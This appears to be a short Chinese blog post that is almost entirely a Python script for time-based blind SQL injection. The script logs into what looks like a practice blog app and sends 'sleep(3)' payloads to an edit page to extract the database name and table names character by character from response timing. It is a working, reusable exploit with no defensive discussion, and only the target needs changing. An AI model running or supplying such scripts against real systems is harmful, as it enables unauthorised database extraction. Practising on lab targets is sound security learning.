# -*- coding: utf-8 -*- # @Time : 2022/6/16 23:45 # @Author : admin # @Email : 1985264689@qq.com # @File : timeblind.py # @Project : 项目 # @脚本说明 : import time,requests #保持session会话状态 url = 'http://192.168.0.0/learn/blog/login-1.php' data = {'username':'admin','password':'','vcode':'0000'} session = requests.session() session.post(url=url,data=data) #取数据库长度 for i in range(1, 15): start = time.time() url1 = f"http://192.168.0.0/learn/blog/edit.php?id=1 and if(length(database())={i}, sleep(3), 1)" send = session.get(url=url1) end = time.time() sendtime = end-start if int(sendtime) >= 2: print(i) #取数据库名称 sum = 'abcdefghijklmnopqrstuvwxyz0123456789,_' dataname = '' for k in range(1,16): for i in sum: start = time.time() url2 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and if(substr(database(),"{k}",1)="{i}", sleep(3), 1)' data_name = session.get(url=url2) end = time.time() sendtime = end-start if int(sendtime) >= 2: dataname += i break print(dataname) # #取数据库表名 table_list = '' for h in range(0, 15): for i in sum: start = time.time() url3 = f'http://192.168.0.0/learn/blog/edit.php?id=1 and ' \ f'if(substr((select group_concat(table_name) from information_schema.tables where table_schema = "{dataname}"),"{h}",1)="{i}", sleep(3), 1)' table_name = session.get(url=url3) end = time.time() sendtime = end - start if int(sendtime) >= 2: table_list += i break print(table_list)
Python SQL时间型盲注
于 2022-07-03 17:29:49 首次发布